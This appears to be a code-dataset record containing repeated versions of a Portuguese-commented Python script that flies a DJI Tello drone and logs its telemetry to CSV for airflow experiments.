'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
print('Nivel da bateria é: {}'.format(str(bateria)))
print('Tempo de início foi {}'.format(str(tempo1)))
print('Tempo de término foi de {}'.format(str(tempo2)))
while int(tempo2) - int(tempo1) < 10:
print('Nivel da bateria é: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
___Padrão para nome dos arquivos das tabelas___
Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
print('Nivel da bateria é: {}'.format(str(bateria)))
print('Tempo de início foi {}'.format(str(tempo1)))
print('Tempo de término foi de {}'.format(str(tempo2)))
while int(tempo2) - int(tempo1) < 10:
print('Nivel da bateria é: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
___Padrão para nome dos arquivos das tabelas___
Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
print('Nivel da bateria é: {}'.format(str(bateria)))
print('Tempo de início foi {}'.format(str(tempo1)))
print('Tempo de término foi de {}'.format(str(tempo2)))
while int(tempo2) - int(tempo1) < 10:
print('Nivel da bateria é: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from djitellopy import Tello
import time
import threading
import pandas as pd
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
___Padrão para nome dos arquivos das tabelas___
Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',
'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])
"""
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
"""
def fly(self):
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while timestampFinal - timestampInicial < self.tempoVoo:
try:
timestampFinal = int(round(time.time() * 1000))
self.__data.append(self.tello.get_states())
if not len(self.__data) % 20 == 0:
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000))
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],
item[5], item[7], item[9], item[11], item[13], item[15],
item[17], item[19], item[21], item[23], item[25], item[27],
item[29], item[31]]
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:len(tempo1) - 1]
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
print('Nivel da bateria é: {}'.format(str(bateria)))
print('Tempo de início foi {}'.format(str(tempo1)))
print('Tempo de término foi de {}'.format(str(tempo2)))
while int(tempo2) - int(tempo1) < 10:
print('Nivel da bateria é: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:len(tempo2) - 1]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from djitellopy import Tello
import time
import threading
import pandas as pd
class DataTello:
def __init__(self):
# Inicia objeto de controle do Tello
self.tello = Tello()
# Array onde será armazenado a lista de dados coletado pelo Tello
self.__data = []
self.__array = []
# Tempo de voo em mili segundos
self.tempoVoo = 420000
'''
___Padrão para nome dos arquivos das tabelas___
Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
'''
# Padrão de nome
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
'yaw', 'vgx', 'vgy', 'vgz',
'templ', 'temph', 'tof',
'height', 'battery', 'barometer',
'time', 'agx', 'agy', 'agz'])
'''
self.__startCollector = False
self.__endProgram = False
threadCollector = threading.Thread(target=self.dataCollector, args=())
threadCollector.daemon = False
threadCollector.start()
def dataCollector(self):
while True:
if self.__startCollector:
self.__data.append(self.tello.get_states())
if self.__endProgram:
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
break
'''
def fly(self):
#
self.tello.connect()
self.tello.takeoff()
timestampInicial = int(round(time.time() * 1000))
timestampFinal = timestampInicial
while ((timestampFinal - timestampInicial) < self.tempoVoo):
try:
timestampFinal = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__data.append(self.tello.get_states())
if (not len(self.__data) % 20 == 0):
self.tello.send_command_without_return('command')
except KeyboardInterrupt:
print ('\n . . .\n')
self.tello.end()
break
self.tello.land()
self.tello.end()
for item in self.__data:
timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados
self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7],
item[9], item[11], item[13], item[15], item[17], item[19],
item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame
self.__df.to_csv('{}.csv'.format(self.nomeArquivo))
def stop(self):
self.tello.end()
def run(self):
self.tello.connect()
self.tello.takeoff()
tempo1 = self.tello.get_flight_time()
tempo1 = tempo1[0:(len(tempo1)-1)]
#time.sleep(3)
bateria = self.tello.get_battery()
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:(len(tempo2)-1)]
print('Nivel da bateria é: {}'.format(str(bateria)))
print('Tempo de início foi {}'.format(str(tempo1)))
print('Tempo de término foi de {}'.format(str(tempo2)))
while ((int(tempo2) - int(tempo1)) < 10):
print('Nivel da bateria é: ' + str(bateria))
self.__array.append(self.tello.get_attitude())
self.__data.append(self.tello.get_states())
tempo2 = self.tello.get_flight_time()
tempo2 = tempo2[0:(len(tempo2)-1)]
self.tello.land()
self.tello.end()
print(self.__array)
print(self.__data)
def main():
dataTello = DataTello()
dataTello.fly()
#dataTello.stop()
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "9e751bbddabbec7c5e997578d99ef1b8c35efe06",
"index": 8108,
"step-1": "<mask token>\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from djitellopy import Tello\nimport time\nimport threading\nimport pandas as pd\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from djitellopy import Tello\nimport time\nimport threading\nimport pandas as pd\n\nclass DataTello:\n \n def __init__(self):\n # Inicia objeto de controle do Tello\n self.tello = Tello()\n \n # Array onde será armazenado a lista de dados coletado pelo Tello\n self.__data = []\n self.__array = []\n\n # Tempo de voo em mili segundos\n self.tempoVoo = 420000\n\n '''\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n '''\n\n # Padrão de nome\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll', \n 'yaw', 'vgx', 'vgy', 'vgz', \n 'templ', 'temph', 'tof', \n 'height', 'battery', 'barometer', \n 'time', 'agx', 'agy', 'agz'])\n '''\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n ''' \n\n def fly(self):\n #\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n\n while ((timestampFinal - timestampInicial) < self.tempoVoo):\n try:\n timestampFinal = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__data.append(self.tello.get_states())\n if (not len(self.__data) % 20 == 0):\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print ('\\n . . .\\n')\n self.tello.end() \n break\n\n self.tello.land()\n self.tello.end()\n\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] 